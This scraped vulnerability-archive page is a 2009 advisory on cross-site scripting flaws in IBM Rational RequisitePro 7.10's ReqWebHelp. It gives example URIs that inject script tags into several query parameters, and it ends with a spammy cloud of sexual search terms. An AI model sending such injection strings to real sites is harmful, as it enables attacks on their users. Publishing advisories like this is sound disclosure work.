about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , IBM Rational RequisitePro ReqWebHelp Multiple Cross Site Scripting Vulnerabilities


Title IBM Rational RequisitePro ReqWebHelp Multiple Cross Site Scripting Vulnerabilities
Published 2009-10-15-12:00AM
Updated 2009-10-19-06:28PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  IBM
Vulnerable  IBM Rational RequisitePro 7.10
Not Vulnerable  
Code  Attackers can exploit these issues by enticing an unsuspecting victim into following a malicious URI.The following example URIs are available:http://www.example.com/ReqWebHelp/advanced/workingSet.jsp?operation=add*/--></script><script>alert(289325)</script>&workingSet=http://www.example.com/ReqWebHelp/basic/searchView.jsp?searchWord=>''><script>alert(306531)</script>&maxHits=>''><script>alert(306531)</script>&scopedSearch=>''><script>alert(306531)</script>&scope=>''><script>alert(306531)</script>
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 21:18:30 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Wwwsexwoma www.watchh news for c www.tianko zeroboard news for C Arab photo xam Gunz Www.2tod.C phpBB mozi Cortonsex www.imajen woltlab 2. Sri lanka modernbill video.goog ios t357t high power PHOTOSEXYS www.xxwxa. news for c components netapp 6.0 news for c www.hotsex SEX PICTUR www.dhakas netapp 6.0 PHBB news for c 200 /compo vedieosex. news for c www.dhakas Movable Ty 94feizhuli sexarabved BORNO VIDE www scoolg soild conv news for c 200 /compo move sex n...of bol ms05-020 Www.waptri www.bluemo Xxxx.muvie